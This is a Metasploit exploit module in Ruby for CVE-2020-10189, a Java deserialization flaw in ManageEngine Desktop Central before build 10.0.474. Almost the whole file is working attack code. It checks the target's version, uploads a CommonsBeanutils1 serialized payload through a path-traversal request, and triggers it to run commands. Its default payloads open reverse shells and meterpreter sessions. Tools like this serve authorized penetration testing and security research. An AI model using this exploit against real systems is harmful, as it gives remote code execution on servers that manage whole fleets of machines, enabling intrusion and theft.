modules/exploits/windows/http/desktopcentral_deserialization.rb
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
Rank = GreatRanking
prepend Msf::Exploit::Remote::AutoCheck
include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::CmdStager
include Msf::Exploit::FileDropper
include Msf::Exploit::JavaDeserialization
def initialize(info = {})
super(
update_info(
info,
'Name' => 'ManageEngine Desktop Central Java Deserialization',
'Description' => %q{
This module exploits a Java deserialization vulnerability in the
getChartImage() method from the FileStorage class within ManageEngine
Desktop Central versions < 10.0.474. Tested against 10.0.465 x64.
Quoting the vendor's advisory on fixed versions:
"The short-term fix for the arbitrary file upload vulnerability was
released in build 10.0.474 on January 20, 2020. In continuation of
that, the complete fix for the remote code execution vulnerability is
now available in build 10.0.479."
},
'Author' => [
'mr_me', # Discovery and exploit
'wvu' # Module
],
'References' => [
['CVE', '2020-10189'],
['URL', 'https://srcincite.io/advisories/src-2020-0011/'],
['URL', 'https://srcincite.io/pocs/src-2020-0011.py.txt'],
['URL', 'https://twitter.com/steventseeley/status/1235635108498948096'],
['URL', 'https://www.manageengine.com/products/desktop-central/remote-code-execution-vulnerability.html']
],
'DisclosureDate' => '2020-03-05', # 0day release
'License' => MSF_LICENSE,
'Platform' => 'win',
'Arch' => [ARCH_CMD, ARCH_X86, ARCH_X64],
'Privileged' => true,
'Targets' => [
[
'Windows Command',
{
'Arch' => ARCH_CMD,
'Type' => :win_cmd,
'DefaultOptions' => {
'PAYLOAD' => 'cmd/windows/powershell_reverse_tcp'
}
}
],
[
'Windows Dropper',
{
'Arch' => [ARCH_X86, ARCH_X64],
'Type' => :win_dropper,
'CmdStagerFlavor' => :certutil, # This works without issue
'DefaultOptions' => {
'PAYLOAD' => 'windows/x64/meterpreter/reverse_tcp'
}
}
],
[
'PowerShell Stager',
{
'Arch' => [ARCH_X86, ARCH_X64],
'Type' => :psh_stager,
'DefaultOptions' => {
'PAYLOAD' => 'windows/x64/meterpreter/reverse_tcp'
}
}
]
],
'DefaultTarget' => 2,
'DefaultOptions' => {
'SSL' => true,
'WfsDelay' => 60 # It can take a little while to trigger
},
'Notes' => {
'Stability' => [SERVICE_RESOURCE_LOSS], # May 404 the upload page?
'Reliability' => [FIRST_ATTEMPT_FAIL], # Payload upload may fail
'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK]
}
)
)
register_options([
Opt::RPORT(8383),
OptString.new('TARGETURI', [true, 'Base path', '/'])
])
end
def check
res = send_request_cgi(
'method' => 'GET',
'uri' => normalize_uri(target_uri.path, 'configurations.do')
)
unless res
return CheckCode::Unknown('Target did not respond to check.')
end
unless res.code == 200 && res.body.include?('ManageEngine Desktop Central')
return CheckCode::Unknown('Target is not running Desktop Central.')
end
build = res.get_html_document.at('//input[@id = "buildNum"]/@value')&.text
unless build&.match(/\d+/)
return CheckCode::Detected(
'Target did not respond with Desktop Central build.'
)
end
# Desktop Central build 100474 is equivalent to version 10.0.474
if build.to_i < 100474
return CheckCode::Appears(
"Desktop Central #{build} is a vulnerable build."
)
end
CheckCode::Safe("Desktop Central #{build} is NOT a vulnerable build.")
end
def exploit
print_status("Executing #{target.name} for #{datastore['PAYLOAD']}")
case target['Type']
when :win_cmd
execute_command(payload.encoded)
when :win_dropper
execute_cmdstager
when :psh_stager
execute_command(cmd_psh_payload(
payload.encoded,
payload.arch.first,
remove_comspec: true
))
end
end
def execute_command(cmd, _opts = {})
vprint_status("Executing command: #{cmd}")
# I identified mr_me's binary blob as the CommonsBeanutils1 payload :)
java_payload = generate_java_deserialization_for_command(
'CommonsBeanutils1',
'cmd',
cmd
)
# XXX: Patch in expected serialVersionUID
java_payload[140, 8] = "\xcf\x8e\x01\x82\xfe\x4e\xf1\x7e"
# Rock 'n' roll!
upload_serialized_payload(java_payload)
deserialize_payload
end
def upload_serialized_payload(serialized_payload)
print_status('Uploading serialized payload')
res = send_request_cgi(
'method' => 'POST',
'uri' => normalize_uri(target_uri.path, '/mdm/client/v1/mdmLogUploader'),
'ctype' => 'application/octet-stream',
'vars_get' => {
# Traversal from C:\Program Files\DesktopCentral_Server\mdm-logs\foo\bar
'udid' => '\\..\\..\\..\\webapps\\DesktopCentral\\_chart',
'filename' => 'logger.zip'
},
'data' => serialized_payload
)
unless res && res.code == 200
fail_with(Failure::UnexpectedReply, 'Could not upload serialized payload')
end
print_good('Successfully uploaded serialized payload')
# Shell lands in C:\Program Files\DesktopCentral_Server\bin
register_file_for_cleanup('..\\webapps\\DesktopCentral\\_chart\\logger.zip')
end
def deserialize_payload
print_status('Deserializing payload')
res = send_request_cgi(
'method' => 'GET',
'uri' => normalize_uri(target_uri.path, 'cewolf'),
'vars_get' => {
'img' => '\\logger.zip'
}
)
unless res && res.code == 200
fail_with(Failure::UnexpectedReply, 'Could not deserialize payload')
end
print_good('Successfully deserialized payload')
end
end